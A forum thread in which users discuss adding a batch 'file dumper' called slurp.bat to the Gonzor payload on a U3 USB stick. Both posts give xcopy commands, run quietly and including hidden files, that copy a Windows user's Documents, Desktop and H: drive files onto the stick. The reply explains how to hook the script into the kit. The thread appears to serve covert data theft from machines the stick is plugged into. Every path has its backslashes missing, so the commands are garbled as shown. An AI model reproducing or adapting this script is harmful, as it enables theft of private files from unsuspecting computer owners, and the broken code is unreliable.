ok so, help adding to Gonzor.

premiumunleaded

so i have gonzor works great; thank you.

the problem i have is how do i integrate a homemade file dumper with this code.

:: My Documents files
mkdir documents%computername%MyDocuments
xcopy "C:Documents and Settings%username%My Documents*.doc" l:documents%computername%MyDocuments /s/c/q/r/h 
xcopy "C:Documents and Settings%username%My Documents*.txt" l:documents%computername%MyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.xls" l:documents%computername%MyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.csv" l:documents%computername%MyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpg" l:documents%computername%MyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.gif" documents%computername%MyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.htm" documents%computername%MyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.ppt" documents%computername%MyDocuments /s/c/q/r/h 
xcopy "h:*.doc" documents%computername%MyDocuments /s/c/q/r/h 

:: Desktop files
mkdir documents%computername%Desktop
xcopy "C:Documents and Settings%username%Desktop*.doc" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.txt" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.xls" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.csv" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.jpg" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.gif" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.htm" documents%computername%Desktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.ppt" documents%computername%MyDocuments /s/c/q/r/h

i nicknamed it slurp. bat

i no other people have asked this question, and i could only find out how to make the file dumper, but not how to integrate it into my new sanDisk Cruzer (u3)

if you could help it would be much appreciated

well since i didnt use theprod key dump, i just linked it to slurp. bat, then remove /nosavereg and put a %1, and use this to make slurp,

:: My Documents files
mkdir %1documents%computername%MyDocuments
xcopy "C:Documents and Settings%username%My Documents*.*" %1documents%computername%MyDocuments /s/c/q/r/h
xcopy "h:*.*" %1documents%computername%MyDocuments /s/c/q/r/h 

:: Desktop files
mkdir %1documents%computername%Desktop
xcopy "C:Documents and Settings%username%Desktop*.*" %1documents%computername%Desktop /s/c/q/r/h

the H: is just a specific hard drive for me.